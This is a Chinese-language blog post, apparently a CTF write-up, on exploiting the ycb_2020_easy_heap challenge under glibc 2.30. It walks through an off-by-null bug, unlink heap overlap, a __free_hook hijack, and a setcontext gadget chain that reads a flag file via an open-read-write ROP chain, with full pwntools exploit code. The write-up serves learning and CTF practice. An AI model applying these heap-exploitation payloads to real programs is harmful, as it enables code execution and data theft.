<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"github.com","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="堆题的orw在一道堆题里我们想要完成orw的操作就需要我们控制两个东西：sp指针跟ip指针。为此我们就可以利用setcontext setcontext首先这是个libc里的函数，需要用到它是因为它里面存在一些我们所需要的gadget，总的来说其实跟ret2csu差不多。 这个函数的利用大概可以以glibc-2.29为分界线，这是因为在glibc-2.29及之后我们所用到的gadget变成以rdx">
<meta property="og:type" content="article">
<meta property="og:title" content="setcontext+orw">
<meta property="og:url" content="https://github.com/CharonPt/CharonPt.github.io.git/2022/05/21/setcontext-orw/index.html">
<meta property="og:site_name" content="CharonPt的Blog">
<meta property="og:description" content="堆题的orw在一道堆题里我们想要完成orw的操作就需要我们控制两个东西：sp指针跟ip指针。为此我们就可以利用setcontext setcontext首先这是个libc里的函数，需要用到它是因为它里面存在一些我们所需要的gadget，总的来说其实跟ret2csu差不多。 这个函数的利用大概可以以glibc-2.29为分界线，这是因为在glibc-2.29及之后我们所用到的gadget变成以rdx">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2022-05-21T10:58:36.000Z">
<meta property="article:modified_time" content="2022-05-23T23:42:05.385Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="pwn">
<meta property="article:tag" content="堆">
<meta property="article:tag" content="orw">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="https://github.com/CharonPt/CharonPt.github.io.git/2022/05/21/setcontext-orw/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>setcontext+orw | CharonPt的Blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">CharonPt的Blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://github.com/CharonPt/CharonPt.github.io.git/2022/05/21/setcontext-orw/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="John Doe">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="CharonPt的Blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          setcontext+orw
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2022-05-21 18:58:36" itemprop="dateCreated datePublished" datetime="2022-05-21T18:58:36+08:00">2022-05-21</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2022-05-24 07:42:05" itemprop="dateModified" datetime="2022-05-24T07:42:05+08:00">2022-05-24</time>
              </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h3 id="堆题的orw"><a href="#堆题的orw" class="headerlink" title="堆题的orw"></a>堆题的orw</h3><p>在一道堆题里我们想要完成orw的操作就需要我们控制两个东西：sp指针跟ip指针。为此我们就可以利用setcontext</p>
<h3 id="setcontext"><a href="#setcontext" class="headerlink" title="setcontext"></a>setcontext</h3><p>首先这是个libc里的函数，需要用到它是因为它里面存在一些我们所需要的gadget，总的来说其实跟ret2csu差不多。</p>
<p>这个函数的利用大概可以以glibc-2.29为分界线，这是因为在glibc-2.29及之后我们所用到的gadget变成以rdx为索引。以glibc-2.30为例，它长这样</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line">.text:0000000000058000 ; __unwind &#123;</span><br><span class="line">.text:0000000000058000                 endbr64</span><br><span class="line">.text:0000000000058004                 push    rdi</span><br><span class="line">.text:0000000000058005                 lea     rsi, [rdi+128h] ; nset</span><br><span class="line">.text:000000000005800C                 xor     edx, edx        ; oset</span><br><span class="line">.text:000000000005800E                 mov     edi, 2          ; how</span><br><span class="line">.text:0000000000058013                 mov     r10d, 8         ; sigsetsize</span><br><span class="line">.text:0000000000058019                 mov     eax, 0Eh</span><br><span class="line">.text:000000000005801E                 syscall                 ; LINUX - sys_rt_sigprocmask</span><br><span class="line">.text:0000000000058020                 pop     rdx</span><br><span class="line">.text:0000000000058021                 cmp     rax, 0FFFFFFFFFFFFF001h</span><br><span class="line">.text:0000000000058027                 jnb     loc_5814F</span><br><span class="line">.text:000000000005802D                 mov     rcx, [rdx+0E0h]</span><br><span class="line">.text:0000000000058034                 fldenv  byte ptr [rcx]</span><br><span class="line">.text:0000000000058036                 ldmxcsr dword ptr [rdx+1C0h]</span><br><span class="line">.text:000000000005803D                 mov     rsp, [rdx+0A0h]</span><br><span class="line">.text:0000000000058044                 mov     rbx, [rdx+80h]</span><br><span class="line">.text:000000000005804B                 mov     rbp, [rdx+78h]</span><br><span class="line">.text:000000000005804F                 mov     r12, [rdx+48h]</span><br><span class="line">.text:0000000000058053                 mov     r13, [rdx+50h]</span><br><span class="line">.text:0000000000058057                 mov     r14, [rdx+58h]</span><br><span class="line">.text:000000000005805B                 mov     r15, [rdx+60h]</span><br><span class="line">.text:000000000005805F                 test    dword ptr fs:48h, 2</span><br><span class="line">.text:000000000005806B                 jz      loc_58126</span><br><span class="line">......</span><br><span class="line">.text:0000000000058126 loc_58126:                              ; CODE XREF: setcontext+6B↑j</span><br><span class="line">.text:0000000000058126                 mov     rcx, [rdx+0A8h]</span><br><span class="line">.text:000000000005812D                 push    rcx</span><br><span class="line">.text:000000000005812E                 mov     rsi, [rdx+70h]</span><br><span class="line">.text:0000000000058132                 mov     rdi, [rdx+68h]</span><br><span class="line">.text:0000000000058136                 mov     rcx, [rdx+98h]</span><br><span class="line">.text:000000000005813D                 mov     r8, [rdx+28h]</span><br><span class="line">.text:0000000000058141                 mov     r9, [rdx+30h]</span><br><span class="line">.text:0000000000058145                 mov     rdx, [rdx+88h]</span><br><span class="line">.text:0000000000058145 ; &#125; // starts at 58000</span><br><span class="line">.text:000000000005814C ; __unwind &#123;</span><br><span class="line">.text:000000000005814C                 xor     eax, eax</span><br><span class="line">.text:000000000005814E                 retn</span><br></pre></td></tr></table></figure>

<p>重点在setcontext+61开始：<code>mov     rsp, [rdx+0A0h]</code>，以及后续的<code>mov     rcx, [rdx+0A8h]; push    rcx;  ...... ;retn;</code></p>
<p>这个过程中我们可以通过rdx来控制rsp跟最后的返回地址。</p>
<p>对于glibc-2.27及之前的版本，setcontext用rdi作为索引，控制起来要更简单，因为<code>__free_hook</code>的第一个参数是可控的，只需要设置好rdi的值就能在跳到setcontext之后修改目标寄存器的值，然后顺利执行提前布置好的orw chain</p>
<p>对于glibc-2.29及之后的版本，我们还需要用一段ROP去控制rdx的值才行</p>
<p>在glibc-2.29-2.32中有一段gadget就很适用，其位于<code>getkeyserv_handle+567</code>，如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">mov    rdx, qword ptr [rdi + 8]</span><br><span class="line">mov    qword ptr [rsp], rax</span><br><span class="line">call   qword ptr [rdx + 0x20]</span><br></pre></td></tr></table></figure>

<p>通过这段gadget我们就可以通过rdi来控制rdx，并且在call指令中跳到setcontext完成后续步骤。</p>
<h3 id="ycb-2020-easy-heap"><a href="#ycb-2020-easy-heap" class="headerlink" title="ycb_2020_easy_heap"></a>ycb_2020_easy_heap</h3><h4 id="题目"><a href="#题目" class="headerlink" title="题目"></a>题目</h4><p>（libc-2.30）</p>
<p>菜单如下，分别对应add、edit、free、show</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">menu</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;----Welcome --------&quot;</span>);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;1.Take a card&quot;</span>);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;2.Edit&quot;</span>);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;3.Drop a card&quot;</span>);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;4.Take a view&quot;</span>);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;5.Exit&quot;</span>);</span><br><span class="line">  <span class="keyword">return</span> <span class="built_in">printf</span>(<span class="string">&quot;Choice:&quot;</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>在edit功能函数里有个off-by-null</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">edit</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  _BYTE *v0; <span class="comment">// rbx</span></span><br><span class="line">  <span class="keyword">unsigned</span> <span class="keyword">int</span> v2; <span class="comment">// [rsp+Ch] [rbp-14h]</span></span><br><span class="line"></span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">&quot;Index: &quot;</span>);</span><br><span class="line">  v2 = sub_143F();</span><br><span class="line">  <span class="keyword">if</span> ( v2 &gt; <span class="number">0xFF</span> || !qword_4460[v2] )</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">puts</span>(<span class="string">&quot;Don not exist!&quot;</span>);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;Content: &quot;</span>);</span><br><span class="line">  v0 = qword_4460[v2];</span><br><span class="line">  v0[read(<span class="number">0</span>, v0, qword_4060[v2])] = <span class="number">0</span>;          <span class="comment">// off-by-null</span></span><br><span class="line">  <span class="keyword">return</span> <span class="built_in">puts</span>(<span class="string">&quot;[+]Done!&quot;</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>add功能函数</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">add</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">int</span> i; <span class="comment">// [rsp+Ch] [rbp-4h]</span></span><br><span class="line"></span><br><span class="line">  <span class="keyword">for</span> ( i = <span class="number">0</span>; i &lt;= <span class="number">0xFF</span> &amp;&amp; qword_4460[i]; ++i )</span><br><span class="line">    ;</span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">&quot;Size: &quot;</span>);</span><br><span class="line">  qword_4060[i] = sub_143F();</span><br><span class="line">  qword_4460[i] = <span class="built_in">malloc</span>(qword_4060[i]);</span><br><span class="line">  <span class="keyword">if</span> ( !qword_4460[i] )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;[!]Something Wrong!&quot;</span>);</span><br><span class="line">    <span class="built_in">exit</span>(<span class="number">0</span>);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> <span class="built_in">puts</span>(<span class="string">&quot;[+]Done!&quot;</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>别的都很常规就不贴了</p>
<h4 id="checksec"><a href="#checksec" class="headerlink" title="checksec"></a>checksec</h4><p>保护全开，以及开了沙箱，要用orw来做</p>
<h4 id="思路"><a href="#思路" class="headerlink" title="思路"></a>思路</h4><p>引用别的博客的总结</p>
<blockquote>
<p>高版本的<code>off by null</code>不能像之前那样随便地后向合并了，因为对<code>size</code>域的检查更加严格。因此，在高版本的<code>off by null</code>，利用姿势小结如下：</p>
<ul>
<li>如果有地址泄露，最起码可以泄露出<code>libc</code>地址，可以利用<code>last_remainder</code>这个指针；如果能泄露出堆地址，直接构造<code>unlink</code>即可</li>
<li>如果没有地址泄露，可以利用残留地址，进行利用，主要是<code>largebin</code>的<code>fd_nextsize</code>和<code>bk_nextsize</code>，<code>samllbin</code>的残留<code>bk</code>和<code>fastbin</code>的残留<code>fd</code>。围绕这几个构造堆重叠。</li>
</ul>
</blockquote>
<p>他说高版本多了些size域的检查，但是因为我也没总结过哪些保护在哪些版本是有的，哪些版本新出了啥啥保护之类的，所以不是特别清楚</p>
<p>第一点里的利用<code>last remainder</code>指针也没懂是啥意思，后面有题目用到了再回来补吧。</p>
<p>利用残留指针就是指虽然程序中不存在uaf漏洞，但是在有show的情况下可以通过把一些类型的chunk free掉，然后再拿回来，通过其入bin时留下的指针来进行地址的泄漏，这个还是很好懂的。</p>
<p>将这道题分别两部分来讲：首先是构造堆重叠来控制tcache的fd指针，劫持<code>__free_hook</code>。然后就是利用setcontext来完成orw的过程。</p>
<h4 id="构造堆重叠"><a href="#构造堆重叠" class="headerlink" title="构造堆重叠"></a>构造堆重叠</h4><p>这一部分其实比较常规，只要利用unlink来完成堆重叠即可，过程如下</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line">add(<span class="number">0x410</span>)<span class="comment">#0</span></span><br><span class="line">add(<span class="number">0x20</span>)<span class="comment">#1</span></span><br><span class="line">add(<span class="number">0x20</span>)<span class="comment">#2</span></span><br><span class="line">add(<span class="number">0x4f0</span>)<span class="comment">#3</span></span><br><span class="line">add(<span class="number">0x10</span>)<span class="comment">#4</span></span><br><span class="line"></span><br><span class="line">free(<span class="number">0</span>)</span><br><span class="line">add(<span class="number">0x410</span>)<span class="comment">#3</span></span><br><span class="line">show(<span class="number">0</span>)</span><br><span class="line">p.recvuntil(<span class="string">&quot;: &quot;</span>)</span><br><span class="line">libc_base = u64(p.recv(<span class="number">6</span>).ljust(<span class="number">8</span>,<span class="string">&#x27;\x00&#x27;</span>)) - (<span class="number">0x7f7db95ecbe0</span> - <span class="number">0x00007f7db9402000</span>)</span><br><span class="line"><span class="built_in">print</span> <span class="string">&quot;libc_base = &quot;</span>,<span class="built_in">hex</span>(libc_base)</span><br><span class="line">setcontext = libc_base + (<span class="number">0x7f4e6f508000</span> - <span class="number">0x00007f4e6f4b0000</span>)</span><br><span class="line">free_hook = libc_base + (<span class="number">0x7f4e6f69db20</span> - <span class="number">0x00007f4e6f4b0000</span>)</span><br><span class="line"></span><br><span class="line">free(<span class="number">1</span>)</span><br><span class="line">free(<span class="number">2</span>)</span><br><span class="line">add(<span class="number">0x28</span>)<span class="comment">#1</span></span><br><span class="line"></span><br><span class="line">show(<span class="number">1</span>)</span><br><span class="line">p.recvuntil(<span class="string">&quot;: &quot;</span>)</span><br><span class="line">heap_base = u64(p.recv(<span class="number">6</span>).ljust(<span class="number">8</span>,<span class="string">&#x27;\x00&#x27;</span>)) - <span class="number">0x6c0</span></span><br><span class="line"><span class="built_in">print</span> <span class="string">&quot;heap_base = &quot;</span>,<span class="built_in">hex</span>(heap_base)</span><br><span class="line"></span><br><span class="line"><span class="comment">#unlink</span></span><br><span class="line">edit(<span class="number">0</span>,p64(<span class="number">0</span>) + p64(<span class="number">0x470</span>) + p64(heap_base+<span class="number">0x6f0</span> - <span class="number">0x18</span>) + p64(heap_base+<span class="number">0x6f0</span> - <span class="number">0x10</span>))</span><br><span class="line">add(<span class="number">0x28</span>)<span class="comment">#2</span></span><br><span class="line">edit(<span class="number">1</span>,<span class="string">&#x27;a&#x27;</span>*<span class="number">0x20</span> + p64(<span class="number">0x470</span>))</span><br><span class="line">edit(<span class="number">1</span>,p64(heap_base+<span class="number">0x2a0</span>))</span><br><span class="line">free(<span class="number">3</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">#hijack</span></span><br><span class="line">add(<span class="number">0x460</span>)<span class="comment">#3</span></span><br><span class="line">free(<span class="number">1</span>)</span><br><span class="line">free(<span class="number">2</span>)</span><br><span class="line">edit(<span class="number">3</span>,<span class="string">&#x27;a&#x27;</span>*<span class="number">0x400</span> + p64(<span class="number">0x420</span>) + p64(<span class="number">0x31</span>) + p64(free_hook))</span><br><span class="line"></span><br><span class="line">add(<span class="number">0x20</span>)</span><br><span class="line">add(<span class="number">0x20</span>)<span class="comment">#2</span></span><br></pre></td></tr></table></figure>

<p>这一部分值得注意的是fake_chunk中fd跟bk指针的构造，因为我们无法泄漏程序基址的缘故，我们无法知道在.bss中保存的<code>&amp;P</code>的地址，但是可以换个思路，我们只需要在某个chunk里写入<code>P</code>的地址，而堆地址是可以泄露的，这样我们同样可以绕过unlink的检测，对于上面的exp来讲就是倒数第29行那步</p>
<p>当然<code>P</code>的地址也不一定要我们手动写入，有时也可以利用堆中残留的指针来实现。</p>
<h4 id="gadget-setcontext-orw"><a href="#gadget-setcontext-orw" class="headerlink" title="gadget + setcontext + orw"></a>gadget + setcontext + orw</h4><p>因为是glibc-2.30的版本，所以我们用到了前面讲的<code>getkeyserv_handle+567</code>里的gadget</p>
<p>我们将<code>__free_hook</code>修改成这个gadget的地址</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#mov    rdx,QWORD PTR [rdi+0x8]</span></span><br><span class="line"><span class="comment">#mov    QWORD PTR [rsp],rax</span></span><br><span class="line"><span class="comment">#call   QWORD PTR [rdx+0x20]</span></span><br><span class="line">gadget = libc_base + (<span class="number">0x7fc0540d8b20</span> - <span class="number">0x00007fc053f84000</span>)</span><br><span class="line"></span><br><span class="line">edit(<span class="number">2</span>,p64(gadget))</span><br></pre></td></tr></table></figure>

<p>然后随便找些地方写入orw chain以及flag字符串</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">pop_rdi = libc_base + libc.search(asm(<span class="string">&quot;pop rdi\nret&quot;</span>)).<span class="built_in">next</span>()</span><br><span class="line">pop_rsi = libc_base + libc.search(asm(<span class="string">&quot;pop rsi\nret&quot;</span>)).<span class="built_in">next</span>()</span><br><span class="line">pop_rdx_r12 = libc_base + <span class="number">0x11c3b1</span></span><br><span class="line">read = libc_base + libc.symbols[<span class="string">&#x27;read&#x27;</span>]</span><br><span class="line">write = libc_base + libc.symbols[<span class="string">&#x27;write&#x27;</span>]</span><br><span class="line">ope = libc_base + libc.symbols[<span class="string">&#x27;open&#x27;</span>]</span><br><span class="line">ret = libc_base + <span class="number">0x256b9</span></span><br><span class="line"></span><br><span class="line">flag_addr = heap_base + <span class="number">0x720</span></span><br><span class="line">orw_addr = heap_base + <span class="number">0x740</span></span><br><span class="line"></span><br><span class="line">orw = p64(pop_rdi) + p64(flag_addr) + p64(pop_rsi) + p64(<span class="number">0</span>) + p64(ope)</span><br><span class="line">orw += p64(pop_rdi) + p64(<span class="number">3</span>) + p64(pop_rsi) + p64(heap_base) + p64(pop_rdx_r12) + p64(<span class="number">0x20</span>) + p64(<span class="number">0</span>) + p64(read)</span><br><span class="line">orw += p64(pop_rdi) + p64(<span class="number">1</span>) + p64(pop_rsi) + p64(heap_base) + p64(pop_rdx_r12) + p64(<span class="number">0x20</span>) + p64(<span class="number">0</span>) + p64(write)</span><br><span class="line"></span><br><span class="line">add(<span class="number">0x10</span>)<span class="comment">#5</span></span><br><span class="line">add(<span class="number">0x150</span>)<span class="comment">#6</span></span><br><span class="line">add(<span class="number">0x150</span>)<span class="comment">#7</span></span><br><span class="line">edit(<span class="number">5</span>,<span class="string">&#x27;./flag\x00\x00&#x27;</span>)</span><br><span class="line">edit(<span class="number">6</span>,orw)</span><br></pre></td></tr></table></figure>

<p>在做题的时候还发现有些用libc.search找出来的gadget在没有执行权限的libc段里，导致crash了，也不知道是啥情况，所以可能还是用ropper之类的找好一点。</p>
<p>然后就是最后一步，控制好rdi的值，在相应地址布置好对应的值即可</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">payload = p64(heap_base+<span class="number">0x8b0</span>)<span class="comment">#rdi</span></span><br><span class="line">payload += p64(heap_base+<span class="number">0x8a0</span>)</span><br><span class="line">payload = payload.ljust(<span class="number">0x20</span>,<span class="string">&#x27;\x00&#x27;</span>)</span><br><span class="line">payload += p64(setcontext+<span class="number">61</span>)</span><br><span class="line">payload = payload.ljust(<span class="number">0xa0</span>,<span class="string">&#x27;\x00&#x27;</span>)</span><br><span class="line">payload += p64(orw_addr)<span class="comment">#rsp</span></span><br><span class="line">payload += p64(ret)<span class="comment">#rcx</span></span><br><span class="line"></span><br><span class="line">edit(<span class="number">7</span>,payload)</span><br><span class="line">free(<span class="number">7</span>)</span><br></pre></td></tr></table></figure>

<p>稍微解释一下上面这部分，free掉chunk7之后<code>p64(heap_base+0x8b0)</code>会被传给rdi，<code>[rdi - 8]</code>也就是<code>*(heap_base+0x8b0 - 8)</code>对应的就是payload中的第二个p64，这个值会传给rdx。然后就是根据gadget剩下的部分以及setcontext的部分来布置地址即可。</p>
<h4 id="别的思路"><a href="#别的思路" class="headerlink" title="别的思路"></a>别的思路</h4><p>对于本题而言还有一些别的挺不错的解法，但是暂时还没试过，先挂在这<a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/236832#h3-9">PWN堆溢出技巧：ORW的解题手法与万金油Gadgets - 安全客，安全资讯平台 (anquanke.com)</a></p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/pwn/" rel="tag"># pwn</a>
              <a href="/tags/%E5%A0%86/" rel="tag"># 堆</a>
              <a href="/tags/orw/" rel="tag"># orw</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2022/05/16/tcache/" rel="prev" title="tcache">
      <i class="fa fa-chevron-left"></i> tcache
    </a></div>
      <div class="post-nav-item">
    <a href="/2022/05/31/glibc-2-32/" rel="next" title="glibc-2.32">
      glibc-2.32 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
